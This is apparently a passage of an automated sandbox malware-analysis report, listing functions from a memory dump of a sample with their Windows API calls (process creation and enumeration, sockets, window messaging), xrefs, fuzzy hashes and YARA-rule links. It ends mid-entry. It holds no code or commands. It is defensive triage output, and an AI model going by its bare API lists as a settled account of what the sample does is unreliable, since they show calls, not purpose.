Instruction Fuzzy Hash: C9218032614218BBEB168F94DC85FEB376EEB8D754F118514F9149B190C671DC9287A0

Function 002F5439 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 002F544D
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 002F54A1
SetErrorMode.KERNEL32(00000000,?,?,0031DCD0), ref: 002F5515

Strings

%lu, xrefs: 002F54B4

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 7b20fccf276c754519fa8ea6083a6082c0d559616f7a79190e3520de56ea0848
Instruction ID: 188c9ac8f20be3af717a39a5fb469b513057b74ee9b65cbcddec2494a4ffd21b
Opcode Fuzzy Hash: 7b20fccf276c754519fa8ea6083a6082c0d559616f7a79190e3520de56ea0848
Instruction Fuzzy Hash: 9C317174A10109AFDB11EF54C885EAAB7F8EF09304F1480A9F909DB262DB71EE45CF61

Function 00318305 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 00318339
EnumChildWindows.USER32(?,0031802F,00000000), ref: 003183B0

Part of subcall function 0028249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002824B0

Strings

(5, xrefs: 00318317
(5, xrefs: 0031834A

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Window$ActiveChildEnumLongWindows
String ID: (5$(5
API String ID: 3814560230-2090118349
Opcode ID: 4cd0501974dd4d2919667472b4f2e0ff5f965f024310f154ccdf9b9d0f83daf3
Instruction ID: 3f9d36289535d82c6fd2923ef274e94651d4d01094c837351bff17083d61acd6
Opcode Fuzzy Hash: 4cd0501974dd4d2919667472b4f2e0ff5f965f024310f154ccdf9b9d0f83daf3
Instruction Fuzzy Hash: 2D214A79201705DFC72ADF28D840A96B7E9FB4E721F250A19E875873E0DB70A860DB64

Function 00314C89 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00314CED
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00314D02
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00314D0F

Strings

msctls_trackbar32, xrefs: 00314CC4

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 1ef83126b44a0b3cc2175bbeddd150d23766aa4bfc0da64d315e3f04adb16155
Instruction ID: d6ea47b247752dbf128e1b89243c4a41bb8689ba6788d326e2789df838d2ff77
Opcode Fuzzy Hash: 1ef83126b44a0b3cc2175bbeddd150d23766aa4bfc0da64d315e3f04adb16155
Instruction Fuzzy Hash: 64110671240248BEEF225F65DC06FEB37ACEF89B64F124524FA55E60A0C671DC91DB50

Function 002E389E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00288577: _wcslen.LIBCMT ref: 0028858A

Part of subcall function 002E36F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 002E3712
Part of subcall function 002E36F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 002E3723
Part of subcall function 002E36F4: GetCurrentThreadId.KERNEL32 ref: 002E372A
Part of subcall function 002E36F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 002E3731

GetFocus.USER32 ref: 002E38C4

Part of subcall function 002E373B: GetParent.USER32(00000000), ref: 002E3746

GetClassNameW.USER32(?,?,00000100), ref: 002E390F
EnumChildWindows.USER32(?,002E3987), ref: 002E3937

Strings

%s%d, xrefs: 002E394B

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 351e951baf931ed29793cfa362b440dede6bf659df00904924b98608fa494476
Instruction ID: 96b1710440bcc18b6db860e0880380f2554a0f3c6959c5989030e3fa66154b44
Opcode Fuzzy Hash: 351e951baf931ed29793cfa362b440dede6bf659df00904924b98608fa494476
Instruction Fuzzy Hash: 1D11E4B56502456BCF11BF758C8AAED77AAAF98300F808069F9099B293CF709915CF30

Function 002859FF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 00285A34
DestroyWindow.USER32(?,002837B8,?,?,?,?,?,00283709,?,?), ref: 00285A91

Strings

<)5, xrefs: 002C4F34
<)5, xrefs: 00285A09

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: DeleteDestroyObjectWindow
String ID: <)5$<)5
API String ID: 2587070983-2870545413
Opcode ID: 2b5f9197b3d70c783bcc0bb4dfc9d244986616014354d6db00418ad8abff4c56
Instruction ID: bef3c8d4a3d675184567ed41a01cea4cc84ab848c78e12a72f9c4255c2d7acd6
Opcode Fuzzy Hash: 2b5f9197b3d70c783bcc0bb4dfc9d244986616014354d6db00418ad8abff4c56
Instruction Fuzzy Hash: 9A21FF39227A12CFDB1AAF15D8A4B6637E9B746312F04415DE801973B1CB749C74CB80

Function 00316321 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00316360
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 0031638D
DrawMenuBar.USER32(?), ref: 0031639C

Strings

0, xrefs: 0031632E

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 07e98f9c46739ccf22f38456d98f3466f2fc494e90b106d64a8fb5f186d6e555
Instruction ID: 4737c740c2e87b8794e4d3da730c497187f12d1c304d839cdc708b34b9498e86
Opcode Fuzzy Hash: 07e98f9c46739ccf22f38456d98f3466f2fc494e90b106d64a8fb5f186d6e555
Instruction Fuzzy Hash: 5701AD31510218EFDB169F50DC84BEE7BB9FB4A310F108099E809D6160CF308A95EF20

Function 0031823D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41windowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,003528E0,0031AD55,000000FC,?,00000000,00000000,?), ref: 0031823F
GetFocus.USER32 ref: 00318247

Part of subcall function 0028249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002824B0

Part of subcall function 00282234: GetWindowLongW.USER32(?,000000EB), ref: 00282242

SendMessageW.USER32(?,000000B0,000001BC,000001C0), ref: 003182B4

Strings

(5, xrefs: 00318254

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Window$Long$FocusForegroundMessageSend
String ID: (5
API String ID: 3601265619-4024434197
Opcode ID: 42ee30fab7a8c7758f3460f9a78e94dd4094d9dd8aa13bfb699e9b911065a94d
Instruction ID: 9fd99db60108a76acbe34164f8cd6a346764b5273ee5098963048b10331e4f45
Opcode Fuzzy Hash: 42ee30fab7a8c7758f3460f9a78e94dd4094d9dd8aa13bfb699e9b911065a94d
Instruction Fuzzy Hash: 9E015235202500CFC31B9F68D854AA633AAEF8E322F154559E416873F0CB316C57CB50

Function 00318526 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

DestroyAcceleratorTable.USER32(?), ref: 00318576
CreateAcceleratorTableW.USER32(00000000,?,?,?,002FBE96,00000000,00000000,?,00000001,00000002), ref: 0031858C
GetForegroundWindow.USER32(?,002FBE96,00000000,00000000,?,00000001,00000002), ref: 00318595

Part of subcall function 0028249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002824B0

Strings

(5, xrefs: 00318532

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: AcceleratorTableWindow$CreateDestroyForegroundLong
String ID: (5
API String ID: 986409557-4024434197
Opcode ID: edbe879790aaf8fb95d26b832c8caf9ccc233baee936d840f5758e5fae2166c7
Instruction ID: fea2cdc4c55094ee4f63ff4ae0aefd051af217e0ea8c7a96897836ad1ca059ae
Opcode Fuzzy Hash: edbe879790aaf8fb95d26b832c8caf9ccc233baee936d840f5758e5fae2166c7
Instruction Fuzzy Hash: FE012D35501304DFCB2A9F69DC84AE637BAFB0A326F118519F511867B0DB30A9A4CF84

Function 00318BCD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00354038,0035407C), ref: 00318C1A
CloseHandle.KERNEL32 ref: 00318C2C

Strings

|@5, xrefs: 00318BE5
8@5, xrefs: 00318BD6

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: 8@5$|@5
API String ID: 3712363035-3020434346
Opcode ID: 727ff34c08f63263a529e8d8d2c08f12a11382c686ae42930cc828f9c09778d9
Instruction ID: 1eadfe716f31ef264a5fcf489ca78654aad4090aab961fb54c876ca0c939a8d6
Opcode Fuzzy Hash: 727ff34c08f63263a529e8d8d2c08f12a11382c686ae42930cc828f9c09778d9
Instruction Fuzzy Hash: F2F0BEB2281304BBE3162B64AC45FB7BE6CEB0975AF104420BF08D70F1EA714C9486B9

Function 002E096F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a0aecf8e8e1425735edc3caaab0a85e344e93e151861475d6d9265b05c25055
Instruction ID: 103ab78bbd34e52837b8c2430926c07f3dee80f22343fe001919d736e240a888
Opcode Fuzzy Hash: 4a0aecf8e8e1425735edc3caaab0a85e344e93e151861475d6d9265b05c25055
Instruction Fuzzy Hash: 8CC1AE75A1024AEFDB04CF95C894EAEB7B5FF48308F608599E505EB251C7B0ED92CB90

Function 002B41F3 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 002B427E
__alldvrm.LIBCMT ref: 002B447F
__alldvrm.LIBCMT ref: 002B44A1

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
Instruction ID: 66e5ce428a40f9ea4d4c44ca173b072f9f13aa64862d95c2c791aeeafaa9c6bb
Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
Instruction Fuzzy Hash: 2FA148719203869FDB11EF18C8D1BEEBBF4EF11390F2842ADE9959B243C6749961CB50

Function 002E0D26 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00320BD4,?), ref: 002E0EE0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00320BD4,?), ref: 002E0EF8
CLSIDFromProgID.OLE32(?,?,00000000,0031DCE0,000000FF,?,00000000,00000800,00000000,?,00320BD4,?), ref: 002E0F1D
_memcmp.LIBVCRUNTIME ref: 002E0F3E

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 6bc13ed5ed1268d5f3403fba460c44e50609ea2ac2dbe9f95d9836266d9f14eb
Instruction ID: 71dcca8a2fbb79075fc5e0d9763a03cc8d8cca11f78b1883741554c155915fa4
Opcode Fuzzy Hash: 6bc13ed5ed1268d5f3403fba460c44e50609ea2ac2dbe9f95d9836266d9f14eb
Instruction Fuzzy Hash: 6C813971A1010AEFCB04DF94C884EEEB7B9FF89315F204598F506AB250DB71AE46CB60

Function 0030B0DC Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0030B10C
Process32FirstW.KERNEL32(00000000,?), ref: 0030B11A

Part of subcall function 0028B329: _wcslen.LIBCMT ref: 0028B333

Process32NextW.KERNEL32(00000000,?), ref: 0030B1FC
CloseHandle.KERNEL32(00000000), ref: 0030B20B

Part of subcall function 0029E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,002C4D73,?), ref: 0029E395

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 9299938e59f5d310ab833d5e6ae7e16f3228c3fd5613fbebdecd0648e6dc98cc
Instruction ID: 6170036eba9e3177b71a3dfcc15095c9f2e277875303082a4cddb316ac4eeac6
Opcode Fuzzy Hash: 9299938e59f5d310ab833d5e6ae7e16f3228c3fd5613fbebdecd0648e6dc98cc
Instruction Fuzzy Hash: 63518D75509300AFC711EF24C886A5BBBE8FF89754F40892DF58997291EB30D914CF92

Function 002C1711 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 002C1840

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: e92d66708106573030741b918e8a1f0b9eaa608be2f6faa50cb01df5867ae513
Instruction ID: 71c08e65315f793604cd7aff73b3f912b35f4a4b644e272e7d5af5ab4961f81b
Opcode Fuzzy Hash: e92d66708106573030741b918e8a1f0b9eaa608be2f6faa50cb01df5867ae513
Instruction Fuzzy Hash: 31415B31634101ABEB216FB98C47FAE76A8EF07770F244729F428D6193DB7448715A61

Function 00302533 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 0030255A
WSAGetLastError.WSOCK32 ref: 00302568
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 003025E7
WSAGetLastError.WSOCK32 ref: 003025F1

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 163e68fdb9570583b89bfc62eb3a5f2cab206cdb2d28a23a49a095a10b24a866
Instruction ID: 802082869f0767645b6127cd506a84c694324583378f29df0248a91374706962
Opcode Fuzzy Hash: 163e68fdb9570583b89bfc62eb3a5f2cab206cdb2d28a23a49a095a10b24a866
Instruction Fuzzy Hash: 0C41C678A00200AFE721AF24C89AF2677E5AB45718F54C448F9199F3D2D772ED51CB91

Function 00316CB0 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00316D1A
ScreenToClient.USER32(?,?), ref: 00316D4D
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00316DBA

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 123ed1c9b9fcf6efb9ba56edca800918f14fc640b22330e0f0241884e52d0d14
Instruction ID: 39a886d1b3d967a39ebef00482d3883d76039cf35640fd3622782e393bc23959
Opcode Fuzzy Hash: 123ed1c9b9fcf6efb9ba56edca800918f14fc640b22330e0f0241884e52d0d14
Instruction Fuzzy Hash: F7511C74A00209AFCF1ADFA8D9819EE7BB6FF49360F218159F9159B290D730ED91CB50

Function 002BB79F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12158b3bcaef50d5b76b99ccb64de36337ffde7932643205c579dc74b5fcb78f
Instruction ID: 7fd79ceaa881d658676695523c6ca2d7761e6a053feb29d1fa0edb634d87c971
Opcode Fuzzy Hash: 12158b3bcaef50d5b76b99ccb64de36337ffde7932643205c579dc74b5fcb78f
Instruction Fuzzy Hash: 2C410B71920704AFD726AF78CC41BAABBEDEB88750F10862DF511DB291D7B199618B80

Function 002F611E Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 002F61C8
GetLastError.KERNEL32(?,00000000), ref: 002F61EE
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 002F6213
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 002F623F

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 6308902ce7b0bb4214980b05e4d1666ba9c376ea2b57c50802d5ea03212868dc
Instruction ID: ff2bf81f800f504ca23d262a9521c345cb9918b37bc37f6f49e450ca4fc6cf75
Opcode Fuzzy Hash: 6308902ce7b0bb4214980b05e4d1666ba9c376ea2b57c50802d5ea03212868dc
Instruction Fuzzy Hash: DD415C39620611DFCB11EF14C545A5EBBE6EF8A310B198498F94A9B3A2CB34FC11CF91

Function 002EB41E Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

